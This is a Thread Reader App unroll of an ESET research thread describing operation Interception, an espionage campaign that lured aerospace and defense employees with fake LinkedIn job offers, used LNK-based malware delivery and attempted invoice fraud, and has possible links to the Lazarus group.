My Authors
Read all threads
#ESETresearch analyzed operation #Interception, a new espionage campaign targeting aerospace & defense companies in Europe and the Middle East. Initial contact was made via #LinkedIn, where attackers approached targets with fake job offers @jiboutin welivesecurity.com/2020/06/17/ope… 1/5
The attackers sent a password protected RAR archive containing a LNK file responsible for showing a decoy PDF and downloading additional malware. In some cases, this archive was sent directly through #LinkedIn instant messenger. #ESETresearch 2/5
While the victim was being deceived by the decoy PDF, a scheduled task was created, launching WMIC to execute a script embedded in a remote XSL file. This enabled the attackers to get their initial foothold inside the targeted company and gain persistence on the computer. 3/5
Besides espionage, #ESETresearch saw moonlighting activities from #Interception’s operators. They set up a #BEC scheme by finding an unpaid invoice and reached out directly to the client for payment to a bank account they controlled. Fortunately, it wasn’t successful. 4/5
While we cannot conclusively link this activity to any known groups, technical links to the #Lazarus group exist. Read more about this research on operation #Interception on #WLS welivesecurity.com/wp-content/upl…
IoCs are available on our GitHub repository: github.com/eset/malware-i… 5/5
Missing some Tweet in this thread? You can try to force a refresh.

Keep Current with ESET research

Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!